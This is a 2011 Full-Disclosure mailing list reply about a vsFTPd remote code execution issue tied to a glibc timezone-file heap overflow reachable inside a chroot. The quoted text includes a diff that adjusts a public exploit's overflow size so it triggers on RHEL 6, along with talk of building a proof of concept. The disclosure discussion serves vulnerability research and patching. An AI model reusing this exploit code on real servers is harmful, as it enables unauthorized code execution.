[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] vsFTPd remote code execution

Does that mean that dividead's bug in glibc was not patched?
I have the feeling that it wasn't, dividead's blogpost is from mid 2009
Awkward :>

Am 13. Dezember 2011 21:12 schrieb Ramon de C Valle <rcvalle@xxxxxxxxxx>:
>
>
>> as you can obviously see vsftpd loads the /lib/libgcc_s.so.1 inside
>> the chroot,
>> so voila we have the same issue as with FreeBSD ftpd/proftpd.
>> I am now looking into the possibility to modify
>> http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c
>>
>> and use as the library. It will be a fun Proof of Concept.
>
> Hats off to you! :)
>
>>
>> Anyone with an up2date linux local root which only makes use of
>> syscalls? :>
>>
>> All this was tested on a CentOS 5.5 installation, vsFTPd 2.3.4 was
>> compiled from sources
>> and launched from xinetd.
>
> I've also triggered this in RHEL 6 with its latest version of vsftpd 
> installed with the following changes made to dividead's exploit:
>
> --- a.c 2011-12-13 18:05:50.701999990 -0200
> +++ b.c 2011-12-13 18:06:26.874000006 -0200
> @@ -59,8 +59,8 @@
>         total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
>                 & ~(__alignof__ (struct ttinfo) - 1));
>
> -        /* value of chars, to get a malloc(0) */
> -        evil2 = 0 - total_size;
> +        /* value of chars, to get a malloc(500) */
> +        evil2 = 0 - total_size + 500;
>         PUT_32BIT_MSB(evil.tzh_charcnt, evil2);
>
>         p = (char *)&evil;
> @@ -68,6 +68,6 @@
>                 printf("%c", p[i]);
>
>         /* data we overflow with */
> -        for (i = 0; i < 50000; i++)
> +        for (i = 0; i < 500000; i++)
>                 printf("A");
>  }
>
>
> --
> Ramon de C Valle / Red Hat Security Response Team

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/